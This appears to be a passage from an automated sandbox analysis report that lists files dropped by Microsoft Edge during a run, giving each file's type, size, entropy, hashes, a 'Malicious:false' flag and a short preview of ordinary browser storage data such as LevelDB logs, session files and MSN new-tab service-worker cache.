                                                                                                                                                                                                                                                                                                SHA-512:5B46B2A2623B262871D4825A379ACEB05B891E139306C0853494D4F4B9AFC1941FE8398185F6078188ED420F335DFBD7F3A02BFD3D50007DDAA6AECE9F0D4C69
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..]4.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):303
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.138532026033502
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp41Wq1cNwi23oH+TcwtE/a252KLl74ri+q2PcNwi23oH+TcwtE/a2ZIFUv:7p4ccZYeb8xLl4u+vLZYeb8J2FUv
                                                                                                                                                                                                                                                                                                MD5:CA51001DFE381AE840964F13C5DB2567
                                                                                                                                                                                                                                                                                                SHA1:3F3ACE7F8264771D4380C6590422A037BB7BC95E
                                                                                                                                                                                                                                                                                                SHA-256:59490CD4A635393DF468EDEFD1B5B27FE60E7738D6B90AE2E3F853DAD5CA41BA
                                                                                                                                                                                                                                                                                                SHA-512:0F6BD6627BD9934F4095992D384B0683E5200A43677704F28E241331B86AA29C4787A8DB75E1D04FB9A92EB17AE8FF74492670D8C821E000C50D4AED8189174C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:13.102 13c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/07-07:19:13.118 13c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115273
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5774803702102105
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ1Z3f:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0r
                                                                                                                                                                                                                                                                                                MD5:A24670D6A3F6FD1E78B52972CE115A31
                                                                                                                                                                                                                                                                                                SHA1:824C860B6150B32E7CA4D8F38A0BEDB8EE8BB562
                                                                                                                                                                                                                                                                                                SHA-256:983270E1D2987F30881CBEDA9EE0D05EB2AB411815351588C1D65E57EAB0404E
                                                                                                                                                                                                                                                                                                SHA-512:92506EFBB100DE28A8A4BD4E2CD79F2AFCE6AFE32D3BDF0B40F2EBC68082C1F0FF21BCE04676DAF64AE1CA11815ADB769C2CB484FF32EE068B945E6A4BDFE988
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):189857
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.387997043638419
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:+GxdyGTYUWWewXdX9vdxL/kOB9xTh0jaauwPCQ3Zr:fewt9vnL/DBX6jaeZd
                                                                                                                                                                                                                                                                                                MD5:60D134EFF51AAE98194854E2A9919036
                                                                                                                                                                                                                                                                                                SHA1:375E457084EFFAF1BAEF76AE100C0D85CD3AAFFB
                                                                                                                                                                                                                                                                                                SHA-256:DC840BC45AE492AEE3380783C9E542C70A7629CE7585C88056E14FB2BB118FE5
                                                                                                                                                                                                                                                                                                SHA-512:9F49A4F5924D74217FB415FF9A6719865D9C7DC9686F99723A323035B685E11DFF398E42CE9F7504ECAE8B63F8078F2F667EDAF2F2FCBCB35C93B71B3D73CEE8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;\....x.H........,T.8..`,.....L`.....,T...`......L`......Rc2.<.....exports...Rc.Z......module....RcRo.&....define....Rb.A......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....L1{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:aQZK0jXl/l7n/lxEstllTqUx:ayK0zEsMA
                                                                                                                                                                                                                                                                                                MD5:006770934F704682C2E937C60C408C98
                                                                                                                                                                                                                                                                                                SHA1:950806954507FAE3DDD4595EB6DD04E937D4C68E
                                                                                                                                                                                                                                                                                                SHA-256:B19DD0261696B3FE982C560F940089206558B82DC39FF2606679F1C95D13E635
                                                                                                                                                                                                                                                                                                SHA-512:6A33150EE102B9656DB14EA03E8366F0680C7240131CE142211017A800238A1743E152175C166B2B0D42754130920664D22C9C2820015A628628FE95667D94DF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@....u[.oy retne.........................X....,..................W.../.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5593
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4095505318539927
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:K9ysr6n78mYzKXepmVbDa+VXt29Xp+m+VU6w6Ll9iSrk1+QrvH2UxEvN:Nsr6n78mYzKXe0VbDa+Vd29Xp+mKU6nk
                                                                                                                                                                                                                                                                                                MD5:61E762326846A5E437F124C6A252D2EF
                                                                                                                                                                                                                                                                                                SHA1:11BD6A87F1E002DE93D6D5F30C0C0C65A8AE8759
                                                                                                                                                                                                                                                                                                SHA-256:303F1DE150F30A86FF42B45A5938C4B6B7DEFA90ED4F4068BAD58685783D8C43
                                                                                                                                                                                                                                                                                                SHA-512:B701D79DD824C7C50036D711F5F8E48B897867BD1259FC6B13CE0AF5EB844407C7BD71A24F35ABA72BA84E900B7991287BE3168CC3A0041923DCA1CE10288843
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................i9b................next-map-id.1.Cnamespace-56698a45_aecf_4427_b4f7_6702d21d0905-https://ntp.msn.com/.0]T.0.................map-0-shd_sweeper.({.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.6.0.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.n.o.r.e.v.c.c.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.c.,.p.r.g.-.1.s.w.-.l.d.n.y.c.t.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.t.r.a.f.f.i.c.-.t.r.a.n.-.n.y.-.t.,.p.r.g.-.p.2.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.p.2.-.t.r.a.n.-.t.r.d.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.-.t.,.1.s.-.p.2.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.103978624941258
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp49UN4q2PcNwi23oH+TcwtrQMxIFUtL4/c3JZmwl41czkwOcNwi23oH+Tcwtrb:7p49G4vLZYebCFUtL4+J/l41cz54ZYeL
                                                                                                                                                                                                                                                                                                MD5:81FD4B5385C5783F1BE2396A43CDF4D2
                                                                                                                                                                                                                                                                                                SHA1:9A4CE016F09699A393ACF8EF3ECFAEEC8590E293
                                                                                                                                                                                                                                                                                                SHA-256:F6039D6EC416DA600875A8DC988BCE08922151F845856AE3033C9FA48D587859
                                                                                                                                                                                                                                                                                                SHA-512:220888D6A30ABB92E5801E15989467F44F4C2F35920DE04AF23B60FCBAD6288265B5925345C7B9432E68590ACDCCA414E9758D436CC454E43C095831D0169825
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.801 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/07-07:19:03.803 f70 Recovering log #3.2025/01/07-07:19:03.809 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.103978624941258
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp49UN4q2PcNwi23oH+TcwtrQMxIFUtL4/c3JZmwl41czkwOcNwi23oH+Tcwtrb:7p49G4vLZYebCFUtL4+J/l41cz54ZYeL
                                                                                                                                                                                                                                                                                                MD5:81FD4B5385C5783F1BE2396A43CDF4D2
                                                                                                                                                                                                                                                                                                SHA1:9A4CE016F09699A393ACF8EF3ECFAEEC8590E293
                                                                                                                                                                                                                                                                                                SHA-256:F6039D6EC416DA600875A8DC988BCE08922151F845856AE3033C9FA48D587859
                                                                                                                                                                                                                                                                                                SHA-512:220888D6A30ABB92E5801E15989467F44F4C2F35920DE04AF23B60FCBAD6288265B5925345C7B9432E68590ACDCCA414E9758D436CC454E43C095831D0169825
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.801 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/07-07:19:03.803 f70 Recovering log #3.2025/01/07-07:19:03.809 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.830056552358141
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3LakygvW6VpsAF4unxStLp3X2amEtG1ChqFBzVCzV7nTJxQKkOAM4:3LaEv7VzFULp2FEkChSVE5yHOp
                                                                                                                                                                                                                                                                                                MD5:DD984F2C46F07ECF22224E848A68CC3B
                                                                                                                                                                                                                                                                                                SHA1:E35EC24957E9EE2960F84B35C6EB588AC45AC1DD
                                                                                                                                                                                                                                                                                                SHA-256:5787A7BB1ED0B619225DE4401DBF3D0E6E2CE64D735975F05F2094DD5DBC4042
                                                                                                                                                                                                                                                                                                SHA-512:B8745E973791A9BFA4419E196042FBC10C2337D45640930321B0CF32797FA19ECE8E8E40D2A295045D6AF05BF0EB572D6B0992858BBE3DF769761D6764B9FCBE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SNSS........v.v............v.v......".v.v............v.v........v.v........v.v........v.v....!...v.v................................v.v.v.v1..,....v.v$...56698a45_aecf_4427_b4f7_6702d21d0905....v.v........v.v....9...........v.v....v.v........................v.v....................5..0....v.v&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......v.v........v.v...........................v.v............v.v........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........K..+....K..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.156157174115082
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43T1yq2PcNwi23oH+Tcwt7Uh2ghZIFUtL43az1Zmwl43alRkwOcNwi23oH+T8:7p43T1yvLZYebIhHh2FUtL43O/l432Rf
                                                                                                                                                                                                                                                                                                MD5:6580BF88C7E7D7BE9011D8D67312603E
                                                                                                                                                                                                                                                                                                SHA1:3760FD08C2EF2ADEEA61469009F55735918D6F6E
                                                                                                                                                                                                                                                                                                SHA-256:141A4652E2B99FD907F440F40746900E8D9BE463C7E356162437ABDC8283ACF7
                                                                                                                                                                                                                                                                                                SHA-512:37F90DD237E851DBC047B6F7457F7F56998F9AB23E5E3F1B64D6476ADB9E60609753F3437EAB5B9D4373B4F9BC61FF2E1212BBD7B4B684FB081629B5549FAD5C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.945 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/07-07:19:02.946 a74 Recovering log #3.2025/01/07-07:19:02.946 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.156157174115082
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43T1yq2PcNwi23oH+Tcwt7Uh2ghZIFUtL43az1Zmwl43alRkwOcNwi23oH+T8:7p43T1yvLZYebIhHh2FUtL43O/l432Rf
                                                                                                                                                                                                                                                                                                MD5:6580BF88C7E7D7BE9011D8D67312603E
                                                                                                                                                                                                                                                                                                SHA1:3760FD08C2EF2ADEEA61469009F55735918D6F6E
                                                                                                                                                                                                                                                                                                SHA-256:141A4652E2B99FD907F440F40746900E8D9BE463C7E356162437ABDC8283ACF7
                                                                                                                                                                                                                                                                                                SHA-512:37F90DD237E851DBC047B6F7457F7F56998F9AB23E5E3F1B64D6476ADB9E60609753F3437EAB5B9D4373B4F9BC61FF2E1212BBD7B4B684FB081629B5549FAD5C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.945 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/07-07:19:02.946 a74 Recovering log #3.2025/01/07-07:19:02.946 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEZlM:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:CB56B43041289CA4BFD7002A3C8F04B3
                                                                                                                                                                                                                                                                                                SHA1:B482CE30F15F6FC430DE9CB41AF0BB45C5933DB8
                                                                                                                                                                                                                                                                                                SHA-256:CD714930B4C252AA0992BBE3D5FC177BDBCBDA37EDD335585F5645F6C00D7946
                                                                                                                                                                                                                                                                                                SHA-512:B87CF51D6F21781F07156E85F5872C50B0B786DA2AD7ECDCDD43CC9E51CA9278BB3FF35BCDED2870E77DB6DFFE9CD474CF9C34FFDEF892D1A1DBD7D183113202
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.25291038737997
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p4xtvLZYebvqBQFUtL4VZ/l41uR54ZYebvqBvJ:7WXlYebvZgEVw1aoYebvk
                                                                                                                                                                                                                                                                                                MD5:EF41F5E4B8D1DCC8B3C1A0C6BFDAB00B
                                                                                                                                                                                                                                                                                                SHA1:BC6E8F71A2F5061D3BAC1B4DCCED728DBBD0CAA7
                                                                                                                                                                                                                                                                                                SHA-256:A3987336B58C3AD85425ED6B371DCFAFB875440F7725B2311FA3E620C2457134
                                                                                                                                                                                                                                                                                                SHA-512:C09CA6EC373873227FE6FF59019AA7BA35D107F7AEC0EBD4AF50CC835196624EFDD3951B48576F36A8DEA74831C75CD6710EC59D23FA3C54B647D2C1F3FEE0A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.841 1194 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.842 1194 Recovering log #3.2025/01/07-07:19:03.845 1194 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
